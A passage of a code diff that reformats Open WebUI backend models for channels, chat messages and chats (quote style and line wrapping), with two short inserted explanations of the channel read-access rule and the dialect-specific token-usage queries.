         self,
@@ -669,9 +616,7 @@ def pin_channel(
             db.commit()
             return True

-    def update_member_last_read_at(
-        self, channel_id: str, user_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def update_member_last_read_at(self, channel_id: str, user_id: str, db: Optional[Session] = None) -> bool:
         with get_db_context(db) as db:
             membership = (
                 db.query(ChannelMember)
@@ -715,9 +660,7 @@ def update_member_active_status(
             db.commit()
             return True

-    def is_user_channel_member(
-        self, channel_id: str, user_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def is_user_channel_member(self, channel_id: str, user_id: str, db: Optional[Session] = None) -> bool:
         with get_db_context(db) as db:
             membership = (
                 db.query(ChannelMember)
@@ -729,28 +672,20 @@
             )
             return membership is not None

-    def get_channel_by_id(
-        self, id: str, db: Optional[Session] = None
-    ) -> Optional[ChannelModel]:
+    def get_channel_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ChannelModel]:
         try:
             with get_db_context(db) as db:
                 channel = db.query(Channel).filter(Channel.id == id).first()
                 return self._to_channel_model(channel, db=db) if channel else None
         except Exception:
             return None

-    def get_channels_by_file_id(
-        self, file_id: str, db: Optional[Session] = None
-    ) -> list[ChannelModel]:
+    def get_channels_by_file_id(self, file_id: str, db: Optional[Session] = None) -> list[ChannelModel]:
         with get_db_context(db) as db:
-            channel_files = (
-                db.query(ChannelFile).filter(ChannelFile.file_id == file_id).all()
-            )
+            channel_files = db.query(ChannelFile).filter(ChannelFile.file_id == file_id).all()
             channel_ids = [cf.channel_id for cf in channel_files]
             channels = db.query(Channel).filter(Channel.id.in_(channel_ids)).all()
-            grants_map = AccessGrants.get_grants_by_resources(
-                "channel", channel_ids, db=db
-            )
+            grants_map = AccessGrants.get_grants_by_resources('channel', channel_ids, db=db)
             return [
                 self._to_channel_model(
                     channel,
@@ -765,9 +700,7 @@ def get_channels_by_file_id_and_user_id(
     ) -> list[ChannelModel]:
         with get_db_context(db) as db:
             # 1. Determine which channels have this file
-            channel_file_rows = (
-                db.query(ChannelFile).filter(ChannelFile.file_id == file_id).all()
-            )
+            channel_file_rows = db.query(ChannelFile).filter(ChannelFile.file_id == file_id).all()
             channel_ids = [row.channel_id for row in channel_file_rows]

             if not channel_ids:
@@ -787,15 +720,13 @@
                 return []

             # Preload user's group membership
-            user_group_ids = [
-                g.id for g in Groups.get_groups_by_member_id(user_id, db=db)
-            ]
+            user_group_ids = [g.id for g in Groups.get_groups_by_member_id(user_id, db=db)]

             allowed_channels = []

             for channel in channels:
                 # --- Case A: group or dm => user must be an active member ---
-                if channel.type in ["group", "dm"]:
+                if channel.type in ['group', 'dm']:
                     membership = (
                         db.query(ChannelMember)
                         .filter(
@@ -815,8 +746,8 @@
                     query = self._has_permission(
                         db,
                         query,
-                        {"user_id": user_id, "group_ids": user_group_ids},
-                        permission="read",
+                        {'user_id': user_id, 'group_ids': user_group_ids},
+                        permission='read',
                     )
                     allowed = query.first()
@@ -844,7 +775,7 @@ def get_channel_by_id_and_user_id(
                 return None

             # If the channel is a group or dm, read access requires membership (active)
-            if channel.type in ["group", "dm"]:
+            if channel.type in ['group', 'dm']:
                 membership = (
                     db.query(ChannelMember)
                     .filter(
@@ -863,24 +794,18 @@
             query = db.query(Channel).filter(Channel.id == id)

             # Determine user groups
-            user_group_ids = [
-                group.id for group in Groups.get_groups_by_member_id(user_id, db=db)
-            ]
+            user_group_ids = [group.id for group in Groups.get_groups_by_member_id(user_id, db=db)]

             # Apply ACL rules
             query = self._has_permission(
                 db,
                 query,
-                {"user_id": user_id, "group_ids": user_group_ids},
-                permission="read",
+                {'user_id': user_id, 'group_ids': user_group_ids},
+                permission='read',
             )

             channel_allowed = query.first()
-            return (
-                self._to_channel_model(channel_allowed, db=db)
-                if channel_allowed
-                else None
-            )
+            return self._to_channel_model(channel_allowed, db=db) if channel_allowed else None

     def update_channel_by_id(
         self, id: str, form_data: ChannelForm, db: Optional[Session] = None
@@ -898,9 +823,7 @@
                 channel.meta = form_data.meta

             if form_data.access_grants is not None:
-                AccessGrants.set_access_grants(
-                    "channel", id, form_data.access_grants, db=db
-                )
+                AccessGrants.set_access_grants('channel', id, form_data.access_grants, db=db)

             channel.updated_at = int(time.time_ns())
             db.commit()
@@ -912,12 +835,12 @@ def add_file_to_channel_by_id(
         with get_db_context(db) as db:
             channel_file = ChannelFileModel(
                 **{
-                    "id": str(uuid.uuid4()),
-                    "channel_id": channel_id,
-                    "file_id": file_id,
-                    "user_id": user_id,
-                    "created_at": int(time.time()),
-                    "updated_at": int(time.time()),
+                    'id': str(uuid.uuid4()),
+                    'channel_id': channel_id,
+                    'file_id': file_id,
+                    'user_id': user_id,
+                    'created_at': int(time.time()),
+                    'updated_at': int(time.time()),
                 }
             )
@@ -942,11 +865,7 @@ def set_file_message_id_in_channel_by_id(
     ) -> bool:
         try:
             with get_db_context(db) as db:
-                channel_file = (
-                    db.query(ChannelFile)
-                    .filter_by(channel_id=channel_id, file_id=file_id)
-                    .first()
-                )
+                channel_file = db.query(ChannelFile).filter_by(channel_id=channel_id, file_id=file_id).first()
                 if not channel_file:
                     return False
@@ -958,22 +877,18 @@
         except Exception:
             return False

-    def remove_file_from_channel_by_id(
-        self, channel_id: str, file_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def remove_file_from_channel_by_id(self, channel_id: str, file_id: str, db: Optional[Session] = None) -> bool:
         try:
             with get_db_context(db) as db:
-                db.query(ChannelFile).filter_by(
-                    channel_id=channel_id, file_id=file_id
-                ).delete()
+                db.query(ChannelFile).filter_by(channel_id=channel_id, file_id=file_id).delete()
                 db.commit()
                 return True
         except Exception:
             return False

     def delete_channel_by_id(self, id: str, db: Optional[Session] = None) -> bool:
         with get_db_context(db) as db:
-            AccessGrants.revoke_all_access("channel", id, db=db)
+            AccessGrants.revoke_all_access('channel', id, db=db)
             db.query(Channel).filter(Channel.id == id).delete()
             db.commit()
             return True
@@ -1005,24 +920,14 @@ def insert_webhook(
             db.commit()
             return webhook

-    def get_webhooks_by_channel_id(
-        self, channel_id: str, db: Optional[Session] = None
-    ) -> list[ChannelWebhookModel]:
+    def get_webhooks_by_channel_id(self, channel_id: str, db: Optional[Session] = None) -> list[ChannelWebhookModel]:
         with get_db_context(db) as db:
-            webhooks = (
-                db.query(ChannelWebhook)
-                .filter(ChannelWebhook.channel_id == channel_id)
-                .all()
-            )
+            webhooks = db.query(ChannelWebhook).filter(ChannelWebhook.channel_id == channel_id).all()
             return [ChannelWebhookModel.model_validate(w) for w in webhooks]

-    def get_webhook_by_id(
-        self, webhook_id: str, db: Optional[Session] = None
-    ) -> Optional[ChannelWebhookModel]:
+    def get_webhook_by_id(self, webhook_id: str, db: Optional[Session] = None) -> Optional[ChannelWebhookModel]:
         with get_db_context(db) as db:
-            webhook = (
-                db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first()
-            )
+            webhook = db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first()
             return ChannelWebhookModel.model_validate(webhook) if webhook else None

     def get_webhook_by_id_and_token(
@@ -1046,9 +951,7 @@ def update_webhook_by_id(
         db: Optional[Session] = None,
     ) -> Optional[ChannelWebhookModel]:
         with get_db_context(db) as db:
-            webhook = (
-                db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first()
-            )
+            webhook = db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first()
             if not webhook:
                 return None
             webhook.name = form_data.name
@@ -1057,28 +960,18 @@
             db.commit()
             return ChannelWebhookModel.model_validate(webhook)

-    def update_webhook_last_used_at(
-        self, webhook_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def update_webhook_last_used_at(self, webhook_id: str, db: Optional[Session] = None) -> bool:
         with get_db_context(db) as db:
-            webhook = (
-                db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first()
-            )
+            webhook = db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).first()
             if not webhook:
                 return False
             webhook.last_used_at = int(time.time_ns())
             db.commit()
             return True

-    def delete_webhook_by_id(
-        self, webhook_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def delete_webhook_by_id(self, webhook_id: str, db: Optional[Session] = None) -> bool:
         with get_db_context(db) as db:
-            result = (
-                db.query(ChannelWebhook)
-                .filter(ChannelWebhook.id == webhook_id)
-                .delete()
-            )
+            result = db.query(ChannelWebhook).filter(ChannelWebhook.id == webhook_id).delete()
             db.commit()
             return result > 0
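A compact restatement of the read-access rule that get_channel_by_id_and_user_id and get_channels_by_file_id_and_user_id both implement above: active membership gates 'group' and 'dm' channels, while every other channel type goes through the access-grant filter. Illustrative only; the function and parameter names below are not from the patch:

def can_read_channel(channel_type, is_active_member: bool, has_read_grant: bool) -> bool:
    if channel_type in ('group', 'dm'):
        return is_active_member  # grants are not consulted for DMs and group channels
    return has_read_grant        # user, group, or wildcard grant on the 'channel' resource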
backend/open_webui/models/chat_messages.py +112 −175 modified
@@ -47,13 +47,11 @@ def _normalize_timestamp(timestamp: int) -> float:

 class ChatMessage(Base):
-    __tablename__ = "chat_message"
+    __tablename__ = 'chat_message'

     # Identity
     id = Column(Text, primary_key=True)
-    chat_id = Column(
-        Text, ForeignKey("chat.id", ondelete="CASCADE"), nullable=False, index=True
-    )
+    chat_id = Column(Text, ForeignKey('chat.id', ondelete='CASCADE'), nullable=False, index=True)
     user_id = Column(Text, index=True)

     # Structure
@@ -85,9 +83,9 @@ class ChatMessage(Base):
     updated_at = Column(BigInteger)

     __table_args__ = (
-        Index("chat_message_chat_parent_idx", "chat_id", "parent_id"),
-        Index("chat_message_model_created_idx", "model_id", "created_at"),
-        Index("chat_message_user_created_idx", "user_id", "created_at"),
+        Index('chat_message_chat_parent_idx', 'chat_id', 'parent_id'),
+        Index('chat_message_model_created_idx', 'model_id', 'created_at'),
+        Index('chat_message_user_created_idx', 'user_id', 'created_at'),
     )
@@ -135,43 +133,41 @@ def upsert_message(
         """Insert or update a chat message."""
         with get_db_context(db) as db:
             now = int(time.time())
-            timestamp = data.get("timestamp", now)
+            timestamp = data.get('timestamp', now)

             # Use composite ID: {chat_id}-{message_id}
-            composite_id = f"{chat_id}-{message_id}"
+            composite_id = f'{chat_id}-{message_id}'

             existing = db.get(ChatMessage, composite_id)

             if existing:
                 # Update existing
-                if "role" in data:
-                    existing.role = data["role"]
-                if "parent_id" in data:
-                    existing.parent_id = data.get("parent_id") or data.get("parentId")
-                if "content" in data:
-                    existing.content = data.get("content")
-                if "output" in data:
-                    existing.output = data.get("output")
-                if "model_id" in data or "model" in data:
-                    existing.model_id = data.get("model_id") or data.get("model")
-                if "files" in data:
-                    existing.files = data.get("files")
-                if "sources" in data:
-                    existing.sources = data.get("sources")
-                if "embeds" in data:
-                    existing.embeds = data.get("embeds")
-                if "done" in data:
-                    existing.done = data.get("done", True)
-                if "status_history" in data or "statusHistory" in data:
-                    existing.status_history = data.get("status_history") or data.get(
-                        "statusHistory"
-                    )
-                if "error" in data:
-                    existing.error = data.get("error")
+                if 'role' in data:
+                    existing.role = data['role']
+                if 'parent_id' in data:
+                    existing.parent_id = data.get('parent_id') or data.get('parentId')
+                if 'content' in data:
+                    existing.content = data.get('content')
+                if 'output' in data:
+                    existing.output = data.get('output')
+                if 'model_id' in data or 'model' in data:
+                    existing.model_id = data.get('model_id') or data.get('model')
+                if 'files' in data:
+                    existing.files = data.get('files')
+                if 'sources' in data:
+                    existing.sources = data.get('sources')
+                if 'embeds' in data:
+                    existing.embeds = data.get('embeds')
+                if 'done' in data:
+                    existing.done = data.get('done', True)
+                if 'status_history' in data or 'statusHistory' in data:
+                    existing.status_history = data.get('status_history') or data.get('statusHistory')
+                if 'error' in data:
+                    existing.error = data.get('error')

                 # Extract usage - check direct field first, then info.usage
-                usage = data.get("usage")
+                usage = data.get('usage')
                 if not usage:
-                    info = data.get("info", {})
-                    usage = info.get("usage") if info else None
+                    info = data.get('info', {})
+                    usage = info.get('usage') if info else None
                 if usage:
                     existing.usage = usage
                 existing.updated_at = now
@@ -181,26 +177,25 @@
             else:
                 # Insert new
                 # Extract usage - check direct field first, then info.usage
-                usage = data.get("usage")
+                usage = data.get('usage')
                 if not usage:
-                    info = data.get("info", {})
-                    usage = info.get("usage") if info else None
+                    info = data.get('info', {})
+                    usage = info.get('usage') if info else None

                 message = ChatMessage(
                     id=composite_id,
                     chat_id=chat_id,
                     user_id=user_id,
-                    role=data.get("role", "user"),
-                    parent_id=data.get("parent_id") or data.get("parentId"),
-                    content=data.get("content"),
-                    output=data.get("output"),
-                    model_id=data.get("model_id") or data.get("model"),
-                    files=data.get("files"),
-                    sources=data.get("sources"),
-                    embeds=data.get("embeds"),
-                    done=data.get("done", True),
-                    status_history=data.get("status_history")
-                    or data.get("statusHistory"),
-                    error=data.get("error"),
+                    role=data.get('role', 'user'),
+                    parent_id=data.get('parent_id') or data.get('parentId'),
+                    content=data.get('content'),
+                    output=data.get('output'),
+                    model_id=data.get('model_id') or data.get('model'),
+                    files=data.get('files'),
+                    sources=data.get('sources'),
+                    embeds=data.get('embeds'),
+                    done=data.get('done', True),
+                    status_history=data.get('status_history') or data.get('statusHistory'),
+                    error=data.get('error'),
                     usage=usage,
                     created_at=timestamp,
                     updated_at=now,
@@ -210,23 +205,14 @@
             db.refresh(message)
             return ChatMessageModel.model_validate(message)

-    def get_message_by_id(
-        self, id: str, db: Optional[Session] = None
-    ) -> Optional[ChatMessageModel]:
+    def get_message_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ChatMessageModel]:
         with get_db_context(db) as db:
             message = db.get(ChatMessage, id)
             return ChatMessageModel.model_validate(message) if message else None

-    def get_messages_by_chat_id(
-        self, chat_id: str, db: Optional[Session] = None
-    ) -> list[ChatMessageModel]:
+    def get_messages_by_chat_id(self, chat_id: str, db: Optional[Session] = None) -> list[ChatMessageModel]:
         with get_db_context(db) as db:
-            messages = (
-                db.query(ChatMessage)
-                .filter_by(chat_id=chat_id)
-                .order_by(ChatMessage.created_at.asc())
-                .all()
-            )
+            messages = db.query(ChatMessage).filter_by(chat_id=chat_id).order_by(ChatMessage.created_at.asc()).all()
             return [ChatMessageModel.model_validate(message) for message in messages]

     def get_messages_by_user_id(
@@ -262,12 +248,7 @@ def get_messages_by_model_id(
                 query = query.filter(ChatMessage.created_at >= start_date)
             if end_date:
                 query = query.filter(ChatMessage.created_at <= end_date)
-            messages = (
-                query.order_by(ChatMessage.created_at.desc())
-                .offset(skip)
-                .limit(limit)
-                .all()
-            )
+            messages = query.order_by(ChatMessage.created_at.desc()).offset(skip).limit(limit).all()
             return [ChatMessageModel.model_validate(message) for message in messages]

     def get_chat_ids_by_model_id(
@@ -284,7 +265,7 @@
         with get_db_context(db) as db:
             query = db.query(
                 ChatMessage.chat_id,
-                func.max(ChatMessage.created_at).label("last_message_at"),
+                func.max(ChatMessage.created_at).label('last_message_at'),
             ).filter(ChatMessage.model_id == model_id)
             if start_date:
                 query = query.filter(ChatMessage.created_at >= start_date)
@@ -303,9 +284,7 @@
             )
             return [chat_id for chat_id, _ in chat_ids]

-    def delete_messages_by_chat_id(
-        self, chat_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def delete_messages_by_chat_id(self, chat_id: str, db: Optional[Session] = None) -> bool:
         with get_db_context(db) as db:
             db.query(ChatMessage).filter_by(chat_id=chat_id).delete()
             db.commit()
@@ -323,24 +302,18 @@ def get_message_count_by_model(
             from sqlalchemy import func
             from open_webui.models.groups import GroupMember

-            query = db.query(
-                ChatMessage.model_id, func.count(ChatMessage.id).label("count")
-            ).filter(
-                ChatMessage.role == "assistant",
+            query = db.query(ChatMessage.model_id, func.count(ChatMessage.id).label('count')).filter(
+                ChatMessage.role == 'assistant',
                 ChatMessage.model_id.isnot(None),
-                ~ChatMessage.user_id.like("shared-%"),
+                ~ChatMessage.user_id.like('shared-%'),
             )
             if start_date:
                 query = query.filter(ChatMessage.created_at >= start_date)
             if end_date:
                 query = query.filter(ChatMessage.created_at <= end_date)
             if group_id:
-                group_users = (
-                    db.query(GroupMember.user_id)
-                    .filter(GroupMember.group_id == group_id)
-                    .subquery()
-                )
+                group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery()
                 query = query.filter(ChatMessage.user_id.in_(group_users))

             results = query.group_by(ChatMessage.model_id).all()
@@ -360,58 +333,50 @@ def get_token_usage_by_model(

             dialect = db.bind.dialect.name

-            if dialect == "sqlite":
-                input_tokens = cast(
-                    func.json_extract(ChatMessage.usage, "$.input_tokens"), Integer
-                )
-                output_tokens = cast(
-                    func.json_extract(ChatMessage.usage, "$.output_tokens"), Integer
-                )
-            elif dialect == "postgresql":
+            if dialect == 'sqlite':
+                input_tokens = cast(func.json_extract(ChatMessage.usage, '$.input_tokens'), Integer)
+                output_tokens = cast(func.json_extract(ChatMessage.usage, '$.output_tokens'), Integer)
+            elif dialect == 'postgresql':
                 # Use json_extract_path_text for PostgreSQL JSON columns
                 input_tokens = cast(
-                    func.json_extract_path_text(ChatMessage.usage, "input_tokens"),
+                    func.json_extract_path_text(ChatMessage.usage, 'input_tokens'),
                     Integer,
                 )
                 output_tokens = cast(
-                    func.json_extract_path_text(ChatMessage.usage, "output_tokens"),
+                    func.json_extract_path_text(ChatMessage.usage, 'output_tokens'),
                     Integer,
                 )
             else:
-                raise NotImplementedError(f"Unsupported dialect: {dialect}")
+                raise NotImplementedError(f'Unsupported dialect: {dialect}')

             query = db.query(
                 ChatMessage.model_id,
-                func.coalesce(func.sum(input_tokens), 0).label("input_tokens"),
-                func.coalesce(func.sum(output_tokens), 0).label("output_tokens"),
-                func.count(ChatMessage.id).label("message_count"),
+                func.coalesce(func.sum(input_tokens), 0).label('input_tokens'),
+                func.coalesce(func.sum(output_tokens), 0).label('output_tokens'),
+                func.count(ChatMessage.id).label('message_count'),
             ).filter(
-                ChatMessage.role == "assistant",
+                ChatMessage.role == 'assistant',
                 ChatMessage.model_id.isnot(None),
                 ChatMessage.usage.isnot(None),
-                ~ChatMessage.user_id.like("shared-%"),
+                ~ChatMessage.user_id.like('shared-%'),
             )
             if start_date:
                 query = query.filter(ChatMessage.created_at >= start_date)
             if end_date:
                 query = query.filter(ChatMessage.created_at <= end_date)
             if group_id:
-                group_users = (
-                    db.query(GroupMember.user_id)
-                    .filter(GroupMember.group_id == group_id)
-                    .subquery()
-                )
+                group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery()
                 query = query.filter(ChatMessage.user_id.in_(group_users))

             results = query.group_by(ChatMessage.model_id).all()

             return {
                 row.model_id: {
-                    "input_tokens": row.input_tokens,
-                    "output_tokens": row.output_tokens,
-                    "total_tokens": row.input_tokens + row.output_tokens,
-                    "message_count": row.message_count,
+                    'input_tokens': row.input_tokens,
+                    'output_tokens': row.output_tokens,
+                    'total_tokens': row.input_tokens + row.output_tokens,
+                    'message_count': row.message_count,
                 }
                 for row in results
             }
@@ -430,58 +395,50 @@ def get_token_usage_by_user(

             dialect = db.bind.dialect.name

-            if dialect == "sqlite":
-                input_tokens = cast(
-                    func.json_extract(ChatMessage.usage, "$.input_tokens"), Integer
-                )
-                output_tokens = cast(
-                    func.json_extract(ChatMessage.usage, "$.output_tokens"), Integer
-                )
-            elif dialect == "postgresql":
+            if dialect == 'sqlite':
+                input_tokens = cast(func.json_extract(ChatMessage.usage, '$.input_tokens'), Integer)
+                output_tokens = cast(func.json_extract(ChatMessage.usage, '$.output_tokens'), Integer)
+            elif dialect == 'postgresql':
                 # Use json_extract_path_text for PostgreSQL JSON columns
                 input_tokens = cast(
-                    func.json_extract_path_text(ChatMessage.usage, "input_tokens"),
+                    func.json_extract_path_text(ChatMessage.usage, 'input_tokens'),
                     Integer,
                 )
                 output_tokens = cast(
-                    func.json_extract_path_text(ChatMessage.usage, "output_tokens"),
+                    func.json_extract_path_text(ChatMessage.usage, 'output_tokens'),
                     Integer,
                 )
             else:
-                raise NotImplementedError(f"Unsupported dialect: {dialect}")
+                raise NotImplementedError(f'Unsupported dialect: {dialect}')

             query = db.query(
                 ChatMessage.user_id,
-                func.coalesce(func.sum(input_tokens), 0).label("input_tokens"),
-                func.coalesce(func.sum(output_tokens), 0).label("output_tokens"),
-                func.count(ChatMessage.id).label("message_count"),
+                func.coalesce(func.sum(input_tokens), 0).label('input_tokens'),
+                func.coalesce(func.sum(output_tokens), 0).label('output_tokens'),
+                func.count(ChatMessage.id).label('message_count'),
             ).filter(
-                ChatMessage.role == "assistant",
+                ChatMessage.role == 'assistant',
                 ChatMessage.user_id.isnot(None),
                 ChatMessage.usage.isnot(None),
-                ~ChatMessage.user_id.like("shared-%"),
+                ~ChatMessage.user_id.like('shared-%'),
             )
             if start_date:
                 query = query.filter(ChatMessage.created_at >= start_date)
             if end_date:
                 query = query.filter(ChatMessage.created_at <= end_date)
             if group_id:
-                group_users = (
-                    db.query(GroupMember.user_id)
-                    .filter(GroupMember.group_id == group_id)
-                    .subquery()
-                )
+                group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery()
                 query = query.filter(ChatMessage.user_id.in_(group_users))

             results = query.group_by(ChatMessage.user_id).all()

             return {
                 row.user_id: {
-                    "input_tokens": row.input_tokens,
-                    "output_tokens": row.output_tokens,
-                    "total_tokens": row.input_tokens + row.output_tokens,
-                    "message_count": row.message_count,
+                    'input_tokens': row.input_tokens,
+                    'output_tokens': row.output_tokens,
+                    'total_tokens': row.input_tokens + row.output_tokens,
+                    'message_count': row.message_count,
                }
                 for row in results
             }
@@ -497,20 +454,16 @@ def get_message_count_by_user(
             from sqlalchemy import func
             from open_webui.models.groups import GroupMember

-            query = db.query(
-                ChatMessage.user_id, func.count(ChatMessage.id).label("count")
-            ).filter(~ChatMessage.user_id.like("shared-%"))
+            query = db.query(ChatMessage.user_id, func.count(ChatMessage.id).label('count')).filter(
+                ~ChatMessage.user_id.like('shared-%')
+            )
             if start_date:
                 query = query.filter(ChatMessage.created_at >= start_date)
             if end_date:
                 query = query.filter(ChatMessage.created_at <= end_date)
             if group_id:
-                group_users = (
-                    db.query(GroupMember.user_id)
-                    .filter(GroupMember.group_id == group_id)
-                    .subquery()
-                )
+                group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery()
                 query = query.filter(ChatMessage.user_id.in_(group_users))

             results = query.group_by(ChatMessage.user_id).all()
@@ -527,20 +480,16 @@ def get_message_count_by_chat(
             from sqlalchemy import func
             from open_webui.models.groups import GroupMember

-            query = db.query(
-                ChatMessage.chat_id, func.count(ChatMessage.id).label("count")
-            ).filter(~ChatMessage.user_id.like("shared-%"))
+            query = db.query(ChatMessage.chat_id, func.count(ChatMessage.id).label('count')).filter(
+                ~ChatMessage.user_id.like('shared-%')
+            )
             if start_date:
                 query = query.filter(ChatMessage.created_at >= start_date)
             if end_date:
                 query = query.filter(ChatMessage.created_at <= end_date)
             if group_id:
-                group_users = (
-                    db.query(GroupMember.user_id)
-                    .filter(GroupMember.group_id == group_id)
-                    .subquery()
-                )
+                group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery()
                 query = query.filter(ChatMessage.user_id.in_(group_users))

             results = query.group_by(ChatMessage.chat_id).all()
@@ -559,43 +508,35 @@ def get_daily_message_counts_by_model(
             from open_webui.models.groups import GroupMember

             query = db.query(ChatMessage.created_at, ChatMessage.model_id).filter(
-                ChatMessage.role == "assistant",
+                ChatMessage.role == 'assistant',
                 ChatMessage.model_id.isnot(None),
-                ~ChatMessage.user_id.like("shared-%"),
+                ~ChatMessage.user_id.like('shared-%'),
             )
             if start_date:
                 query = query.filter(ChatMessage.created_at >= start_date)
             if end_date:
                 query = query.filter(ChatMessage.created_at <= end_date)
             if group_id:
-                group_users = (
-                    db.query(GroupMember.user_id)
-                    .filter(GroupMember.group_id == group_id)
-                    .subquery()
-                )
+                group_users = db.query(GroupMember.user_id).filter(GroupMember.group_id == group_id).subquery()
                 query = query.filter(ChatMessage.user_id.in_(group_users))

             results = query.all()

             # Group by date -> model -> count
             daily_counts: dict[str, dict[str, int]] = {}
             for timestamp, model_id in results:
-                date_str = datetime.fromtimestamp(
-                    _normalize_timestamp(timestamp)
-                ).strftime("%Y-%m-%d")
+                date_str = datetime.fromtimestamp(_normalize_timestamp(timestamp)).strftime('%Y-%m-%d')
                 if date_str not in daily_counts:
                     daily_counts[date_str] = {}
-                daily_counts[date_str][model_id] = (
-                    daily_counts[date_str].get(model_id, 0) + 1
-                )
+                daily_counts[date_str][model_id] = daily_counts[date_str].get(model_id, 0) + 1

             # Fill in missing days
             if start_date and end_date:
                 current = datetime.fromtimestamp(_normalize_timestamp(start_date))
                 end_dt = datetime.fromtimestamp(_normalize_timestamp(end_date))
                 while current <= end_dt:
-                    date_str = current.strftime("%Y-%m-%d")
+                    date_str = current.strftime('%Y-%m-%d')
                     if date_str not in daily_counts:
                         daily_counts[date_str] = {}
                     current += timedelta(days=1)
@@ -613,9 +554,9 @@ def get_hourly_message_counts_by_model(
             from datetime import datetime, timedelta

             query = db.query(ChatMessage.created_at, ChatMessage.model_id).filter(
-                ChatMessage.role == "assistant",
+                ChatMessage.role == 'assistant',
                 ChatMessage.model_id.isnot(None),
-                ~ChatMessage.user_id.like("shared-%"),
+                ~ChatMessage.user_id.like('shared-%'),
             )

             if start_date:
@@ -628,23 +569,19 @@
             # Group by hour -> model -> count
             hourly_counts: dict[str, dict[str, int]] = {}
             for timestamp, model_id in results:
-                hour_str = datetime.fromtimestamp(
-                    _normalize_timestamp(timestamp)
-                ).strftime("%Y-%m-%d %H:00")
+                hour_str = datetime.fromtimestamp(_normalize_timestamp(timestamp)).strftime('%Y-%m-%d %H:00')
                 if hour_str not in hourly_counts:
                     hourly_counts[hour_str] = {}
-                hourly_counts[hour_str][model_id] = (
-                    hourly_counts[hour_str].get(model_id, 0) + 1
-                )
+                hourly_counts[hour_str][model_id] = hourly_counts[hour_str].get(model_id, 0) + 1

             # Fill in missing hours
             if start_date and end_date:
-                current = datetime.fromtimestamp(
-                    _normalize_timestamp(start_date)
-                ).replace(minute=0, second=0, microsecond=0)
+                current = datetime.fromtimestamp(_normalize_timestamp(start_date)).replace(
+                    minute=0, second=0, microsecond=0
+                )
                 end_dt = datetime.fromtimestamp(_normalize_timestamp(end_date))
                 while current <= end_dt:
-                    hour_str = current.strftime("%Y-%m-%d %H:00")
+                    hour_str = current.strftime('%Y-%m-%d %H:00')
                     if hour_str not in hourly_counts:
                         hourly_counts[hour_str] = {}
                     current += timedelta(hours=1)
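The token-usage aggregations above branch on the database dialect because JSON extraction differs between SQLite and PostgreSQL. A self-contained sketch of just that branch, reusing the exact expressions from the diff (usage_col stands in for ChatMessage.usage):

from sqlalchemy import Integer, cast, func

def usage_token_exprs(dialect_name: str, usage_col):
    # Returns (input_tokens, output_tokens) as integer SQL expressions.
    if dialect_name == 'sqlite':
        return (
            cast(func.json_extract(usage_col, '$.input_tokens'), Integer),
            cast(func.json_extract(usage_col, '$.output_tokens'), Integer),
        )
    if dialect_name == 'postgresql':
        return (
            cast(func.json_extract_path_text(usage_col, 'input_tokens'), Integer),
            cast(func.json_extract_path_text(usage_col, 'output_tokens'), Integer),
        )
    raise NotImplementedError(f'Unsupported dialect: {dialect_name}')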
backend/open_webui/models/chats.py+253 −420 modified@@ -35,7 +35,7 @@ class Chat(Base): - __tablename__ = "chat" + __tablename__ = 'chat' id = Column(String, primary_key=True, unique=True) user_id = Column(String) @@ -49,21 +49,21 @@ class Chat(Base): archived = Column(Boolean, default=False) pinned = Column(Boolean, default=False, nullable=True) - meta = Column(JSON, server_default="{}") + meta = Column(JSON, server_default='{}') folder_id = Column(Text, nullable=True) __table_args__ = ( # Performance indexes for common queries # WHERE folder_id = ... - Index("folder_id_idx", "folder_id"), + Index('folder_id_idx', 'folder_id'), # WHERE user_id = ... AND pinned = ... - Index("user_id_pinned_idx", "user_id", "pinned"), + Index('user_id_pinned_idx', 'user_id', 'pinned'), # WHERE user_id = ... AND archived = ... - Index("user_id_archived_idx", "user_id", "archived"), + Index('user_id_archived_idx', 'user_id', 'archived'), # WHERE user_id = ... ORDER BY updated_at DESC - Index("updated_at_user_id_idx", "updated_at", "user_id"), + Index('updated_at_user_id_idx', 'updated_at', 'user_id'), # WHERE folder_id = ... AND user_id = ... - Index("folder_id_user_id_idx", "folder_id", "user_id"), + Index('folder_id_user_id_idx', 'folder_id', 'user_id'), ) @@ -87,21 +87,19 @@ class ChatModel(BaseModel): class ChatFile(Base): - __tablename__ = "chat_file" + __tablename__ = 'chat_file' id = Column(Text, unique=True, primary_key=True) user_id = Column(Text, nullable=False) - chat_id = Column(Text, ForeignKey("chat.id", ondelete="CASCADE"), nullable=False) + chat_id = Column(Text, ForeignKey('chat.id', ondelete='CASCADE'), nullable=False) message_id = Column(Text, nullable=True) - file_id = Column(Text, ForeignKey("file.id", ondelete="CASCADE"), nullable=False) + file_id = Column(Text, ForeignKey('file.id', ondelete='CASCADE'), nullable=False) created_at = Column(BigInteger, nullable=False) updated_at = Column(BigInteger, nullable=False) - __table_args__ = ( - UniqueConstraint("chat_id", "file_id", name="uq_chat_file_chat_file"), - ) + __table_args__ = (UniqueConstraint('chat_id', 'file_id', name='uq_chat_file_chat_file'),) class ChatFileModel(BaseModel): @@ -191,33 +189,25 @@ class ChatUsageStatsResponse(BaseModel): history_models: dict = {} # models used in the chat history with their usage counts history_message_count: int # number of messages in the chat history history_user_message_count: int # number of user messages in the chat history - history_assistant_message_count: ( - int # number of assistant messages in the chat history - ) + history_assistant_message_count: int # number of assistant messages in the chat history - average_response_time: ( - float # average response time of assistant messages in seconds - ) - average_user_message_content_length: ( - float # average length of user message contents - ) - average_assistant_message_content_length: ( - float # average length of assistant message contents - ) + average_response_time: float # average response time of assistant messages in seconds + 